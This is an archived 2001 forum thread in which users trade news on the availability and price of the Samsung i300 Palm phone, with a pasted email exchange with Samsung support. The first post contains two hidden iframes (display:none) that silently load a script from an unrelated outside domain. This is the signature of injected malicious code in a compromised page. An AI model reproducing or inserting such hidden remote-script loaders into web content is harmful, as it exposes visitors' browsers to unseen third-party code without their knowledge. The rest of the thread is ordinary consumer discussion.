+ Reply to Thread

Thread: Availability?

Availability?

First of all, thanks for creating this forum. I´ve been salivating over this phone for some time now, and I must have driven to all the compusa stores in Dallas trying to get one in vain.

Does anyone know when they´ll start distributing the phone to stores? I read somewhere that Best Buy will receive them Oct. 29, but then again, this phone was supposed to be released last May, so who knows.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I also heard end of october from best buy.... I also heard that best buy will be selling them for $399... if so, I maybe I can get a price match from the $499 I paid at compusa....

only place to get one ASAP is ebay....

Brooks

If you absolutely can not wait any longer... You have to have it now... here is how I got mine. I went into my local CompUSA (in Texas) who was out of the I-300. I pre-paid for one and then asked to speak to the store manager. I asked the store manager since I pre-paid, could he check other store inventories across the country and have one sent to his store. He checked his computer and found several phones around the country in CompUSA stores in smaller non-high tech cities. He had his inventory guy call the store (I think it was in Colorado) and had one Fed Ex to his store. I went into CompUSA Tues and had a phone by Thursday.

Something you may want to try...

BTW... it is worth the wait... very cool!

I tried talking to a manager in Compusa but he was next to useless... I finally gave my phone number to the guy behind the counter and he promised to hold one for me and give me a call when they arrive.

I've had no luck at all in my town (ann arbor, MI), but I am on the waitlist at the local Sprint PCS store.

FYI, here is the latest email from Samsung that I've received:

------------------------------------------------------------------
    Dear Matt,

Thank you for your inquiry. The first batch of phone were sent to the Comp USA and other customers are calling in saying they received the phone from Sprint store or their website. The store are running out fast so that's why i can't find the phone. We are shipping Your business is appreciated.

Sincerely,
    Samtech003
    Wireless Technical Support Group

---------------------------------------------------------------------
    ********** Don't Remove "[SN********]" from the title *************
    When you inquire about our answer...
    With the Serial Number, we could identify your message.

[ You Wrote ]
    Actually, no you can't.

I've checked 5 Best Buys, 3 Comp USAs, 6 Sprint stores in South East Michigan and all their websites. None of these places have the phone. Best Buy says it won't be until mid November -- is this true?

-----Original Message-----
    Sent: Wednesday, October 17, 2001 7:21 PM
    To: comstock@umich.edu
    Subject: [SN042b0c0d]When the I300 to be released in the USA

You can currently purchase the I300 in any of your local Comp USA, Best Buy, and Sprint stores.

Thanks,
    Technical Support
    Samtech075

[ You Wrote ]
    Hello --

My CompUSA had only one unit and sold it out the same day. They say they do not know when more will be coming.

Can you tell me a date for when these will be widely avaialable (like at Sprint or Best Buy) so that I can actually BUY one? As you can see from my previous messages, I've been waiting since Mid-August and have put off purchasing other phones.

Thanks again,
    Matt

Sent: Friday, October 05, 2001 1:29 AM
    Subject: [SN042b0c09]When the I300 to be released in the USA

The i300 will be available next week with CompUSA and the following week with Sprint.

Sincerely,
    Samtech083
    Wireless Technical Support Group

[ You Wrote ]
    Just thought I'd let you know that I've been waiting a long time for this phone and it is still nowhere to be found (even though you claim it is "now avaialable". It's a bit past late August, eh? Can you give me a firm date for when I can puchase this phone and where I might do that? Thanks

Sent: Thursday, July 26, 2001 8:16 PM
    Subject: [SN042b0c03]When the I300 to be released in the USA

We are looking at late August.

Sincerely,
    Technical Support
    Samtech057

[ You Wrote ]
    Great, Thank you -- But when in the third quarter? I am interested in buying a new phone within the next 2-3 weeks and if this is coming out in August then I will wait. Please let me know, thank you.

Sent: Wednesday, July 11, 2001 11:55 PM
    Subject: [SN042b0c01]When the I300 to be released in the USA

Thanks for your interest in the I300. It is due to be released in the third quarter of the year. It will have a full color display and utilize the Palm OS. Features will include voice dialing and speaker phone. The best place to get this phone will be through a local Radio Shack, Best Buy, Circuit City or Sprint PCS phone store. For more information please call us at 1-888-987-4357 and/or visit the telecommunications website at www.samsungusa.com.

Your interest in Samsung products is appreciated.

Sincerely,
    Technical Support
    Samtech057

[ You Wrote ]
    Hello,

I am looking to purchase a new phone and am very excited about the I300 Palm Phone. When will this be avaiable in the USA? Thank you!

Last edited by comstockery; 10-23-2001 at 12:43 PM.

Seems to me that if you want a decent answer, your best bet is Samtech003. I had two similar email correspondences with the Samsung tech support group, each time asking specific questions and each time receiving ambiguous, irrelevant, or incorrect information. Both emails eventually ended up being answered to my satisfaction by Samtech003. Maybe we should all address our emails to this guy in the future...

Angry

I feel your pain brother!

I too have been trying anxiously to get this phone in the metro Chicago area. Here's what I found:

1. Samsung Elec. stated they shipped 30,000 phones to Sprint in early Oct. and it's up to Sprint when they will sell them. They don't get involved.
    2. Sprint states (someone at a local store) the phones are held up in customs (anthrax and all).
    3. CompUSA states they are all sold out country-wide and they will only get 2 per week (per store) at a time when the next order comes in.
    4. Best Buy states they will sell them for $499 and will only get 2 per week (per store) at a time when they come in.
    5. Radio Shack don't have a clue.
    6. Circuit City don't have a clue.

Basically, I call about 20 local stores daily to find one of these babies!

I read a couple of reviews some time ago that said the release date was May, 2001, and since then I´ve been trying to get one. At this point, I´m about to give up since I´ve had a number of unexpected expenses this month and $500 for a phone seems a bit excessive. But the impulse to get such a cool gadget is very strong...

On the other hand I´ve read comments from several people that have had problems with their phones. Maybe it´ll be better to wait a bit until the bugs are ironed out.

Administrator

Arrow

On the other hand I´ve read comments from several people that have had problems with their phones. Maybe it´ll be better to wait a bit until the bugs are ironed out.
    thats the main reason for being on the bleeding edge of technology! i went into one of the local sprint stores today to ask about accessories, and the store person was drooling (albeit secretly) over it...

hehe... I was at best buy... hoping some other samsung accessories might work with the phone...

guy comes over to ask what I'm looking for.... I tell him... he asks for which phone....

next thing I know, I'm giving a demo for 4 employees....

Brooks

Administrator

Arrow

Originally posted by fikse
    hehe... I was at best buy... hoping some other samsung accessories might work with the phone...

guy comes over to ask what I'm looking for.... I tell him... he asks for which phone....

next thing I know, I'm giving a demo for 4 employees....

Brooks

see.. thats what i mean!!!

way to go brooks!!